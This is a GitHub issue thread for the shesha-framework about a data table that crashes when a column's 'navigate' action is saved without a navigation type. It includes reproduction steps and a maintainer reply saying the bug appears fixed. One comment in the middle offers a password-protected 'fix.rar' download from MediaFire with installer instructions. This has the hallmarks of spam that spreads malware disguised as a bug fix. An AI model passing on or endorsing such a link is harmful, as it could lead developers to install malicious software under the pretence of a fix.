### ISSUE TITLE
Data table crash on incomplete action configuration when using navigate on  the column configurations

### ISSUE THREAD

**Issue by miracleMa** [shesha-io/shesha-framework#2080]
**Describe the bug**
 The data table crashes on incomplete action configuration when using the navigate option on the column configurations.

**To Reproduce**
1. Go to 'https://function-adminportal-test.shesha.dev/shesha/forms-designer?id=ae8b347f-cae2-460a-9eec-1afec2d4d482'
2. Click on the data table 
3. Navigate to  Configure columns 
4. Click the "configure column" button to open the columns configuration.
5. Add a column and on that column configuration, navigate  to :

- Type: change it from data to action
- Action configuration: select "common" 
                                   : select " navigate "
6. Navigate to the bottom of the form and click "ok" to save the configurations, without configuring the navigation type.

**Actual results**
After saving the data table crashes.
**Expected behavior**
you should see the newly added column on the data table, even though the action configuration is incomplete

**Screenshots**
![image](https://github.com/user-attachments/assets/81b989e0-99c7-4525-8a9d-d17be569046d)

**Comment by akshsekhr2702** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by hlayisanimazuze** [comment]
Hi @nthangeniphumudzo @miracleMa, This seems to be resolved with the latest changes. We will re-open the issue if it occurs again
